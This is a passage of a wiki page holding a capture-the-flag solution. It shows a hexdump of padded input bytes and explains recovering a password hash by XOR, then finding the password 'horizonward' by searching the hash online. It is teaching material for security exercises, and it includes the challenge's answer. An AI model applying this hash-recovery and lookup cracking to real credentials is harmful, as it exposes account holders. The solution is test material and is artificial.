 +00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000210  41 41 b6 81 c9 e2 a4 97  34 db b7 e5 d8 88 a8 97  |AA......4.......|
 +00000220  03 91 b9 33 a9 7e 03 02  01 0a                    |...3.~....|
 +0000022a
 +
 +
 +
 +</code>
 +
 +The interesting part is "b6 81 c9 e2 a4 97  34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e". XORing the first bytes as discussed yields the hash: 96a1e9c284b714fb97c5f8a888b723b19933a97e
 +Searching for this hash on google yields the password "horizonward" which works.
session/solution/mid-ctf_asks1_3.1405066109.txt.gz · Last modified: 2014/07/11 11:08 by rcaragea

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki